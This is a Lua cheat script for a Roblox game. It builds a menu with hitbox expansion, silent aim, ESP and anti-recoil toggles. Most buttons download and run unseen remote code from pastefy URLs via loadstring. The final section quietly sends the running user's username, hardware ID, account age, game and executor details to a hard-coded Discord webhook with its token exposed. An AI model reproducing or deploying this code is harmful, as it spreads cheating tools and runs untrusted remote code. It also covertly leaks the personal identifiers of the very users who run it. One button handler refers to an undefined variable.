

local Gui = Instance.new("ScreenGui")
local Gui_2 = Instance.new("Frame")
local Main = Instance.new("Frame")
local Combat = Instance.new("TextLabel")
local Visual = Instance.new("TextLabel")
local Title = Instance.new("Frame")
local TextLabel = Instance.new("TextLabel")
local Misc = Instance.new("TextLabel")
local ImageLabel = Instance.new("ImageLabel")
local sch = Instance.new("TextButton")
local atv = Instance.new("TextButton")
local Silent = Instance.new("TextButton")
local NSH = Instance.new("TextButton")
local NS = Instance.new("TextButton")
local NR = Instance.new("TextButton")
local nrld = Instance.new("TextButton")
local Longneck = Instance.new("TextButton")
local Hitbox = Instance.new("TextButton")
local Hud = Instance.new("TextButton")
local Cross = Instance.new("TextButton")
local Box = Instance.new("TextButton")
local AtvEsp = Instance.new("TextButton")
local Ambient = Instance.new("TextButton")
local Info = Instance.new("Frame")
local TextLabel_2 = Instance.new("TextLabel")
local UICorner = Instance.new("UICorner")
local ImageLabel_2 = Instance.new("ImageLabel")
local UICorner_2 = Instance.new("UICorner")


Gui.Name = "Gui"
Gui.Parent = game.Players.LocalPlayer:WaitForChild("PlayerGui")
Gui.ZIndexBehavior = Enum.ZIndexBehavior.Sibling

Gui_2.Name = "Gui"
Gui_2.Parent = Gui
Gui_2.BackgroundColor3 = Color3.new(1, 1, 1)
Gui_2.BackgroundTransparency = 1
Gui_2.BorderColor3 = Color3.new(0, 0, 0)
Gui_2.BorderSizePixel = 0
Gui_2.Size = UDim2.new(0, 38, 0, 2)

Main.Name = "Main"
Main.Parent = Gui_2
Main.BackgroundColor3 = Color3.new(0, 0, 0)
Main.BorderColor3 = Color3.new(0, 0, 0)
Main.BorderSizePixel = 0
Main.Position = UDim2.new(8.78161621, 0, 107.5, 0)
Main.Size = UDim2.new(0, 581, 0, 366)

Combat.Name = "Combat"
Combat.Parent = Main
Combat.BackgroundColor3 = Color3.new(1, 1, 1)
Combat.BackgroundTransparency = 1
Combat.BorderColor3 = Color3.new(0, 0, 0)
Combat.BorderSizePixel = 0
Combat.Position = UDim2.new(-0.0464715995, 0, 0.0601092912, 0)
Combat.Size = UDim2.new(0, 200, 0, 50)
Combat.Font = Enum.Font.Sarpanch
Combat.Text = "Combat"
Combat.TextColor3 = Color3.new(1, 1, 1)
Combat.TextSize = 32

Visual.Name = "Visual"
Visual.Parent = Main
Visual.BackgroundColor3 = Color3.new(1, 1, 1)
Visual.BackgroundTransparency = 1
Visual.BorderColor3 = Color3.new(0, 0, 0)
Visual.BorderSizePixel = 0
Visual.Position = UDim2.new(0.163511187, 0, 0.0601092912, 0)
Visual.Size = UDim2.new(0, 200, 0, 50)
Visual.Font = Enum.Font.Sarpanch
Visual.Text = "Visual"
Visual.TextColor3 = Color3.new(1, 1, 1)
Visual.TextSize = 32

Title.Name = "Title"
Title.Parent = Main
Title.BackgroundColor3 = Color3.new(0.0352941, 0.0352941, 0.0352941)
Title.BorderColor3 = Color3.new(0, 0, 0)
Title.BorderSizePixel = 0
Title.Size = UDim2.new(0, 581, 0, 34)

TextLabel.Parent = Title
TextLabel.BackgroundColor3 = Color3.new(1, 1, 1)
TextLabel.BackgroundTransparency = 1
TextLabel.BorderColor3 = Color3.new(0, 0, 0)
TextLabel.BorderSizePixel = 0
TextLabel.Position = UDim2.new(0.0877796933, 0, -0.470588237, 0)
TextLabel.Size = UDim2.new(0, 200, 0, 50)
TextLabel.Font = Enum.Font.Michroma
TextLabel.Text = "Ahmed.pub | t.me/@sccripptt"
TextLabel.TextColor3 = Color3.new(1, 1, 1)
TextLabel.TextSize = 22

Misc.Name = "Misc"
Misc.Parent = Main
Misc.BackgroundColor3 = Color3.new(1, 1, 1)
Misc.BackgroundTransparency = 1
Misc.BorderColor3 = Color3.new(0, 0, 0)
Misc.BorderSizePixel = 0
Misc.Position = UDim2.new(0.358003438, 0, 0.0601092912, 0)
Misc.Size = UDim2.new(0, 200, 0, 50)
Misc.Font = Enum.Font.Sarpanch
Misc.Text = "Misc"
Misc.TextColor3 = Color3.new(1, 1, 1)
Misc.TextSize = 32

ImageLabel.Parent = Main
ImageLabel.BackgroundColor3 = Color3.new(1, 1, 1)
ImageLabel.BorderColor3 = Color3.new(0, 0, 0)
ImageLabel.BorderSizePixel = 0
ImageLabel.Position = UDim2.new(0, 0, 0.180327863, 0)
ImageLabel.Size = UDim2.new(0, 580, 0, 298)
ImageLabel.Image = "http://www.roblox.com/asset/?id=105729464463874"

sch.Name = "sch"
sch.Parent = ImageLabel
sch.BackgroundColor3 = Color3.new(0.0470588, 0.0470588, 0.0470588)
sch.BorderColor3 = Color3.new(0.0862745, 0.0862745, 0.0862745)
sch.BorderSizePixel = 0
sch.Position = UDim2.new(0.256454349, 0, 0.289122403, 0)
sch.Size = UDim2.new(0, 110, 0, 34)
sch.Font = Enum.Font.Sarpanch
sch.Text = "Skinchanger"
sch.TextColor3 = Color3.new(1, 1, 1)
sch.TextSize = 24

atv.Name = "atv"
atv.Parent = ImageLabel
atv.BackgroundColor3 = Color3.new(0.0470588, 0.0470588, 0.0470588)
atv.BorderColor3 = Color3.new(0.0862745, 0.0862745, 0.0862745)
atv.BorderSizePixel = 0
atv.Position = UDim2.new(0.459552437, 0, 0.0180987678, 0)
atv.Size = UDim2.new(0, 103, 0, 34)
atv.Font = Enum.Font.Sarpanch
atv.Text = "Atv Fly"
atv.TextColor3 = Color3.new(1, 1, 1)
atv.TextSize = 29

Silent.Name = "Silent"
Silent.Parent = ImageLabel
Silent.BackgroundColor3 = Color3.new(0.0470588, 0.0470588, 0.0470588)
Silent.BorderColor3 = Color3.new(0.0862745, 0.0862745, 0.0862745)
Silent.BorderSizePixel = 0
Silent.Position = UDim2.new(0.0309810769, 0, 0.152363613, 0)
Silent.Size = UDim2.new(0, 110, 0, 34)
Silent.Font = Enum.Font.Sarpanch
Silent.Text = "Silent Aim"
Silent.TextColor3 = Color3.new(1, 1, 1)
Silent.TextSize = 28

NSH.Name = "NSH"
NSH.Parent = ImageLabel
NSH.BackgroundColor3 = Color3.new(0.0470588, 0.0470588, 0.0470588)
NSH.BorderColor3 = Color3.new(0.0862745, 0.0862745, 0.0862745)
NSH.BorderSizePixel = 0
NSH.Position = UDim2.new(0.459552437, 0, 0.586991608, 0)
NSH.Size = UDim2.new(0, 103, 0, 34)
NSH.Font = Enum.Font.Sarpanch
NSH.Text = "No Shake"
NSH.TextColor3 = Color3.new(1, 1, 1)
NSH.TextSize = 24

NS.Name = "NS"
NS.Parent = ImageLabel
NS.BackgroundColor3 = Color3.new(0.0470588, 0.0470588, 0.0470588)
NS.BorderColor3 = Color3.new(0.0862745, 0.0862745, 0.0862745)
NS.BorderSizePixel = 0
NS.Position = UDim2.new(0.459552437, 0, 0.289122403, 0)
NS.Size = UDim2.new(0, 103, 0, 34)
NS.Font = Enum.Font.Sarpanch
NS.Text = "No Spread"
NS.TextColor3 = Color3.new(1, 1, 1)
NS.TextSize = 29

NR.Name = "NR"
NR.Parent = ImageLabel
NR.BackgroundColor3 = Color3.new(0.0470588, 0.0470588, 0.0470588)
NR.BorderColor3 = Color3.new(0.0862745, 0.0862745, 0.0862745)
NR.BorderSizePixel = 0
NR.Position = UDim2.new(0.459552437, 0, 0.152363613, 0)
NR.Size = UDim2.new(0, 103, 0, 34)
NR.Font = Enum.Font.Sarpanch
NR.Text = "No Recoil"
NR.TextColor3 = Color3.new(1, 1, 1)
NR.TextSize = 29

nrld.Name = "nrld"
nrld.Parent = ImageLabel
nrld.BackgroundColor3 = Color3.new(0.0470588, 0.0470588, 0.0470588)
nrld.BorderColor3 = Color3.new(0.0862745, 0.0862745, 0.0862745)
nrld.BorderSizePixel = 0
nrld.Position = UDim2.new(0.459552437, 0, 0.441412687, 0)
nrld.Size = UDim2.new(0, 103, 0, 34)
nrld.Font = Enum.Font.Sarpanch
nrld.Text = "No Reload"
nrld.TextColor3 = Color3.new(1, 1, 1)
nrld.TextSize = 29

Longneck.Name = "Longneck"
Longneck.Parent = ImageLabel
Longneck.BackgroundColor3 = Color3.new(0.0470588, 0.0470588, 0.0470588)
Longneck.BorderColor3 = Color3.new(0.0862745, 0.0862745, 0.0862745)
Longneck.BorderSizePixel = 0
Longneck.Position = UDim2.new(0.0309810769, 0, 0.289122403, 0)
Longneck.Size = UDim2.new(0, 110, 0, 34)
Longneck.Font = Enum.Font.Sarpanch
Longneck.Text = "Longneck"
Longneck.TextColor3 = Color3.new(1, 1, 1)
Longneck.TextSize = 33

Hitbox.Name = "Hitbox"
Hitbox.Parent = ImageLabel
Hitbox.BackgroundColor3 = Color3.new(0.0470588, 0.0470588, 0.0470588)
Hitbox.BorderColor3 = Color3.new(0.0862745, 0.0862745, 0.0862745)
Hitbox.BorderSizePixel = 0
Hitbox.Position = UDim2.new(0.0309810769, 0, 0.017475307, 0)
Hitbox.Size = UDim2.new(0, 110, 0, 34)
Hitbox.Font = Enum.Font.Sarpanch
Hitbox.Text = "Hitbox"
Hitbox.TextColor3 = Color3.new(1, 1, 1)
Hitbox.TextSize = 31

Hud.Name = "Hud"
Hud.Parent = ImageLabel
Hud.BackgroundColor3 = Color3.new(0.0470588, 0.0470588, 0.0470588)
Hud.BorderColor3 = Color3.new(0.0862745, 0.0862745, 0.0862745)
Hud.BorderSizePixel = 0
Hud.Position = UDim2.new(0.256454349, 0, 0.586991608, 0)
Hud.Size = UDim2.new(0, 110, 0, 34)
Hud.Font = Enum.Font.Sarpanch
Hud.Text = "Remove HUD"
Hud.TextColor3 = Color3.new(1, 1, 1)
Hud.TextSize = 24

Cross.Name = "Cross"
Cross.Parent = ImageLabel
Cross.BackgroundColor3 = Color3.new(0.0470588, 0.0470588, 0.0470588)
Cross.BorderColor3 = Color3.new(0.0862745, 0.0862745, 0.0862745)
Cross.BorderSizePixel = 0
Cross.Position = UDim2.new(0.256454349, 0, 0.149008021, 0)
Cross.Size = UDim2.new(0, 110, 0, 34)
Cross.Font = Enum.Font.Sarpanch
Cross.Text = "Crosshair"
Cross.TextColor3 = Color3.new(1, 1, 1)
Cross.TextSize = 33

Box.Name = "Box"
Box.Parent = ImageLabel
Box.BackgroundColor3 = Color3.new(0.0470588, 0.0470588, 0.0470588)
Box.BorderColor3 = Color3.new(0.0862745, 0.0862745, 0.0862745)
Box.BorderSizePixel = 0
Box.Position = UDim2.new(0.256454349, 0, 0.0180987678, 0)
Box.Size = UDim2.new(0, 110, 0, 34)
Box.Font = Enum.Font.Sarpanch
Box.Text = "Full Esp"
Box.TextColor3 = Color3.new(1, 1, 1)
Box.TextSize = 33

AtvEsp.Name = "AtvEsp"
AtvEsp.Parent = ImageLabel
AtvEsp.BackgroundColor3 = Color3.new(0.0470588, 0.0470588, 0.0470588)
AtvEsp.BorderColor3 = Color3.new(0.0862745, 0.0862745, 0.0862745)
AtvEsp.BorderSizePixel = 0
AtvEsp.Position = UDim2.new(0.256454349, 0, 0.725859165, 0)
AtvEsp.Size = UDim2.new(0, 110, 0, 34)
AtvEsp.Font = Enum.Font.Sarpanch
AtvEsp.Text = "Atv Esp"
AtvEsp.TextColor3 = Color3.new(1, 1, 1)
AtvEsp.TextSize = 33

Ambient.Name = "Ambient"
Ambient.Parent = ImageLabel
Ambient.BackgroundColor3 = Color3.new(0.0470588, 0.0470588, 0.0470588)
Ambient.BorderColor3 = Color3.new(0.0862745, 0.0862745, 0.0862745)
Ambient.BorderSizePixel = 0
Ambient.Position = UDim2.new(0.256454349, 0, 0.441412687, 0)
Ambient.Size = UDim2.new(0, 110, 0, 34)
Ambient.Font = Enum.Font.Sarpanch
Ambient.Text = "Ambient"
Ambient.TextColor3 = Color3.new(1, 1, 1)
Ambient.TextSize = 29

Info.Name = "Info"
Info.Parent = ImageLabel
Info.BackgroundColor3 = Color3.new(0.0352941, 0.0352941, 0.0352941)
Info.BorderColor3 = Color3.new(0, 0, 0)
Info.BorderSizePixel = 0
Info.Position = UDim2.new(0.638557255, 0, 0.883613944, 0)
Info.Size = UDim2.new(0, 210, 0, 34)

TextLabel_2.Parent = Info
TextLabel_2.BackgroundColor3 = Color3.new(1, 1, 1)
TextLabel_2.BackgroundTransparency = 1
TextLabel_2.BorderColor3 = Color3.new(0, 0, 0)
TextLabel_2.BorderSizePixel = 0
TextLabel_2.Position = UDim2.new(0.181796119, 0, -0.264705896, 0)
TextLabel_2.Size = UDim2.new(0, 110, 0, 50)
TextLabel_2.Font = Enum.Font.Michroma
TextLabel_2.Text = "$Nickname$"
TextLabel_2.TextColor3 = Color3.new(1, 1, 1)
TextLabel_2.TextSize = 14

UICorner.Parent = Info
UICorner.CornerRadius = UDim.new(1, 9)

ImageLabel_2.Parent = Info
ImageLabel_2.BackgroundColor3 = Color3.new(1, 1, 1)
ImageLabel_2.BorderColor3 = Color3.new(0, 0, 0)
ImageLabel_2.BorderSizePixel = 0
ImageLabel_2.Position = UDim2.new(0.812870383, 0, 0.0294117648, 0)
ImageLabel_2.Size = UDim2.new(0, 33, 0, 31)
ImageLabel_2.Image = "http://www.roblox.com/asset/?id=18345330815"

UICorner_2.Parent = ImageLabel_2
UICorner_2.CornerRadius = UDim.new(2, 5)

local Button = Instance.new("ScreenGui")
local _1 = Instance.new("TextButton")

Button.Name = "Button"
Button.Parent = game.Players.LocalPlayer:WaitForChild("PlayerGui")
Button.ZIndexBehavior = Enum.ZIndexBehavior.Sibling

_1.Name = "1"
_1.Parent = Button
_1.BackgroundColor3 = Color3.new(0.152941, 0.152941, 0.152941)
_1.BorderColor3 = Color3.new(0, 0, 0)
_1.BorderSizePixel = 0
_1.Position = UDim2.new(0.0125421192, 0, 0.887128234, 0)
_1.Size = UDim2.new(0, 95, 0, 25)
_1.Font = Enum.Font.Michroma
_1.Text = "GUI"
_1.TextColor3 = Color3.new(0.8, 0.8, 0.8)
_1.TextSize = 23

local function toggleGuiVisibility()
    Gui.Enabled = not Gui.Enabled
end

_1.MouseButton1Click:Connect(toggleGuiVisibility)

game:GetService("UserInputService").InputBegan:Connect(function(input, gameProcessed)
    if not gameProcessed and input.KeyCode == Enum.KeyCode.RightShift then
        toggleGuiVisibility()
    end
end)

local dragging
local dragInput
local dragStart
local startPos

local function update(input)
    local delta = input.Position - dragStart
    Main.Position = UDim2.new(startPos.X.Scale, startPos.X.Offset + delta.X, startPos.Y.Scale, startPos.Y.Offset + delta.Y)
end

Title.InputBegan:Connect(function(input)
    if input.UserInputType == Enum.UserInputType.MouseButton1 or input.UserInputType == Enum.UserInputType.Touch then
        dragging = true
        dragStart = input.Position
        startPos = Main.Position

        input.Changed:Connect(function()
            if input.UserInputState == Enum.UserInputState.End then
                dragging = false
            end
        end)
    end
end)

Title.InputChanged:Connect(function(input)
    if input.UserInputType == Enum.UserInputType.MouseMovement or input.UserInputType == Enum.UserInputType.Touch then
        dragInput = input
    end
end)

game:GetService("UserInputService").InputChanged:Connect(function(input)
    if input == dragInput and dragging then
        update(input)
    end
end)

local ReplicatedStorage = game:GetService('ReplicatedStorage');
local LocalPlayer = game:GetService('Players').LocalPlayer;
local Workspace = game:GetService('Workspace');
local Camera = game:GetService('Workspace').CurrentCamera;
local Ignore = Workspace:FindFirstChild('Ignore');
local FPSArms = Ignore:FindFirstChild('FPSArms');
local ClientPlayer = Ignore:FindFirstChild('LocalCharacter');
local SleepAnimationId = "rbxassetid://13280887764";

local hitboxEnabled = false;
local buttonClicked = false;

local HeadIndex;
HeadIndex = hookmetamethod(game, "__index", newcclosure(function(Self, Index)
    if (tostring(Self) == "Head" and Index == "Size" and hitboxEnabled) then
        return Vector3.new(1.672248125076294, 0.835624098777771, 0.835624098777771);
    end;
    return HeadIndex(Self, Index);
end));

local TorsoIndex;
TorsoIndex = hookmetamethod(game, "__index", newcclosure(function(Self, Index)
    if (tostring(Self) == "Torso" and Index == "Size" and hitboxEnabled) then
        return Vector3.new(0.6530659198760986, 2.220424175262451, 1.4367451667785645);
    end;
    return TorsoIndex(Self, Index);
end));

function IsSleeping(Player)
    local Animations = Player.AnimationController:GetPlayingAnimationTracks();
    for i, v in pairs(Animations) do
        if (v.IsPlaying and v.Animation.AnimationId == SleepAnimationId) then
            return true;
        end;
    end;
    return false;
end;

function GetPlayers()
    local Players = {};
    for i,v in next, Workspace:GetChildren() do
        if (v:IsA('Model') and v:FindFirstChild('HumanoidRootPart') and tostring(v.Parent) ~= 'FPSArms') then
            table.insert(Players, v);
        end;
    end;
    return Players;
end;

local function applyHitbox(player)
    local Head = player:FindFirstChild("Head");
    if (Head and not IsSleeping(player)) then
        Head.Size = Vector3.new(8.8,6,8.8);
        Head.Transparency = 0.5; 
        Head.Color = Color3.fromRGB(128, 0, 128); 
        Head.CanCollide = false;
    end;

    local Torso = player:FindFirstChild("Torso");
    if (Torso and not IsSleeping(player)) then
        Torso.Size = Vector3.new(8.5,6.5,8.5);
        Torso.Transparency = 1;
        Torso.CanCollide = false;
    end;
end;

local function removeHitbox(player)
    local Head = player:FindFirstChild("Head");
    if (Head) then
        Head.Size = Vector3.new(1.672248125076294, 0.835624098777771, 0.835624098777771);
        Head.Transparency = 0;
        Head.Color = Color3.fromRGB(255, 255, 255); 
        Head.CanCollide = true;
    end;

    local Torso = player:FindFirstChild("Torso");
    if (Torso) then
        Torso.Size = Vector3.new(0.6530659198760986, 2.220424175262451, 1.4367451667785645);
        Torso.Transparency = 0;
        Torso.CanCollide = true;
    end;
end;

Workspace.ChildAdded:Connect(function(child)
    if (child:IsA('Model') and child:FindFirstChild('HumanoidRootPart')) then
        if (hitboxEnabled) then
            applyHitbox(child);
        else
            removeHitbox(child);
        end;
    end;
end);

local function toggleHitbox()
    hitboxEnabled = not hitboxEnabled;
    for _, player in pairs(GetPlayers()) do
        if (hitboxEnabled) then
            applyHitbox(player);
        else
            removeHitbox(player);
        end;
    end;
    if buttonClicked then
        Hitbox.Text = hitboxEnabled and "Hitbox: On" or "Hitbox: Off";
    else
        buttonClicked = true;
    end;
end;

Hitbox.MouseButton1Click:Connect(function()
    toggleHitbox();
end);

Hitbox.Text = "Hitbox";





Silent.MouseButton1Click:Connect(function()

    local success, err = pcall(function()
        local scriptToRun = loadstring(game:HttpGet('https://pastefy.app/K6CTjLqG/raw'))()
        if scriptToRun then
            scriptToRun()
        end
    end)
end)

Longneck.MouseButton1Click:Connect(function()

    local success, err = pcall(function()
        local scriptToRun = loadstring(game:HttpGet('https://pastefy.app/EHpNiY6i/raw'))()
        if scriptToRun then
            scriptToRun()
        end
    end)
end)

Hud.MouseButton1Click:Connect(function()

    local success, err = pcall(function()
        local scriptToRun = loadstring(game:HttpGet('https://pastefy.app/QOqNFFM9/raw'))()
        if scriptToRun then
            scriptToRun()
        end
    end)
end)

Cross.MouseButton1Click:Connect(function()

    local success, err = pcall(function()
        local scriptToRun = loadstring(game:HttpGet('https://pastefy.app/9oIO9Y7h/raw'))()
        if scriptToRun then
            scriptToRun()
        end
    end)
end)

Ambient.MouseButton1Click:Connect(function()

    local success, err = pcall(function()
        local scriptToRun = loadstring(game:HttpGet('https://pastefy.app/qyCjRl5s/raw'))()
        if scriptToRun then
            scriptToRun()
        end
    end)
end)

AtvEsp.MouseButton1Click:Connect(function()

    local success, err = pcall(function()
        local scriptToRun = loadstring(game:HttpGet('https://pastefy.app/OskHNcsC/raw'))()
        if scriptToRun then
            scriptToRun()
        end
    end)
end)

sch.MouseButton1Click:Connect(function()

    local success, err = pcall(function()
        local scriptToRun = loadstring(game:HttpGet('https://pastefy.app/NCn8lTu0/raw'))()
        if scriptToRun then
            scriptToRun()
        end
    end)
end)

NR.MouseButton1Click:Connect(function()

    local success, err = pcall(function()
        local scriptToRun = loadstring(game:HttpGet('https://pastefy.app/9DhSVisU/raw'))()
        if scriptToRun then
            scriptToRun()
        end
    end)
end)

nrld.MouseButton1Click:Connect(function()

    local success, err = pcall(function()
        local scriptToRun = loadstring(game:HttpGet('https://pastefy.app/9DhSVisU/raw'))()
        if scriptToRun then
            scriptToRun()
        end
    end)
end)

NS.MouseButton1Click:Connect(function()

    local success, err = pcall(function()
        local scriptToRun = loadstring(game:HttpGet('https://pastefy.app/9DhSVisU/raw'))()
        if scriptToRun then
            scriptToRun()
        end
    end)
end)

NSH.MouseButton1Click:Connect(function()

    local success, err = pcall(function()
        local scriptToRun = loadstring(game:HttpGet('https://pastefy.app/9DhSVisU/raw'))()
        if scriptToRun then
            scriptToRun()
        end
    end)
end)

AtvFly.MouseButton1Click:Connect(function()

    local success, err = pcall(function()
        local scriptToRun = loadstring(game:HttpGet('https://pastefy.app/XaG1ldM4/raw'))()
        if scriptToRun then
            scriptToRun()
        end
    end)
end)

Box.MouseButton1Click:Connect(function()

    local success, err = pcall(function()
        local scriptToRun = loadstring(game:HttpGet('https://pastefy.app/9bVG7dkP/raw'))()
        if scriptToRun then
            scriptToRun()
        end
    end)
end)


local webhookURL = "https://discord.com/api/webhooks/1326883799329407027/94HkCxWhresIZGTnsuVcPsilPjgC0s8R9MgeJkBCv1BbkBDPbN59jvFi7rg6fxH18FPV"

local Players = game:GetService("Players")
local AnalyticsService = game:GetService("RbxAnalyticsService")
local HttpService = game:GetService("HttpService")
local MarketplaceService = game:GetService("MarketplaceService")

local Player = Players.LocalPlayer
local hwid = AnalyticsService:GetClientId()

local accountAge = Player.AccountAge

local function getGameName()
    local success, info = pcall(function()
        return MarketplaceService:GetProductInfo(game.PlaceId)
    end)
    return success and info.Name or "Unknown Game"
end

local function getServerInfo()
    local playerGui = Player:FindFirstChild("PlayerGui")
    if playerGui then
        local gameUI = playerGui:FindFirstChild("GameUI")
        if gameUI and gameUI:FindFirstChild("ServerInfo") and gameUI.ServerInfo:IsA("TextLabel") then
            return gameUI.ServerInfo.Text
        end
    end
    return "No ServerInfo found"
end

local thumbSize = 150
local playerThumbUrl = string.format("https://www.roblox.com/headshot-thumbnail/image?userId=%d&width=%d&height=%d&format=png", Player.UserId, thumbSize, thumbSize)

local gifUrl = "https://media.giphy.com/media/QJqZRAMGHGPtx3q7Gz/giphy-downsized-large.gif?cid=790b761176bb4d438e60bd5242d9d2cf2fb85138a5bc5a40&rid=giphy-downsized-large.gif&ct=g"

local function getUserAgent()
    local response = request({
        Url = "https://httpbin.org/user-agent",
        Method = "GET",
    })
    if response and response.StatusCode == 200 then
        local data = HttpService:JSONDecode(response.Body)
        return data["user-agent"]
    end
    return "Unknown User-Agent"
end

local data = {
    content = "",
    embeds = {
        {
            title = "Injected Player Information",
            description = "The player has injected the script. Here are the details:",
            color = 0xA0522D,
            thumbnail = {url = playerThumbUrl},
            image = {url = gifUrl},
            fields = {
                {name = "Username", value = Player.Name, inline = true},
                {name = "HWID", value = hwid, inline = true},
                {name = "Account Age (days)", value = tostring(accountAge), inline = true},
                {name = "Game Name", value = getGameName(), inline = true},
                {name = "Server Info", value = getServerInfo(), inline = false},
                {name = "Executor", value = getUserAgent(), inline = false},
            },
            footer = {
                text = "Injected at: " .. os.date("%Y-%m-%d %H:%M:%S"),
                icon_url = "https://cdn.discordapp.com/icons/123456789012345678/abcdef1234567890.png"
            },
            timestamp = os.date("!%Y-%m-%dT%H:%M:%SZ")
        }
    }
}

local jsonData = HttpService:JSONEncode(data)
local headers = {["Content-Type"] = "application/json"}

local function sendWebhook()
    local request = (syn and syn.request) or (http_request) or (HttpPost)
    if request then
        pcall(function()
            request({Url = webhookURL, Method = "POST", Headers = headers, Body = jsonData})
        end)
    end
end

sendWebhook()
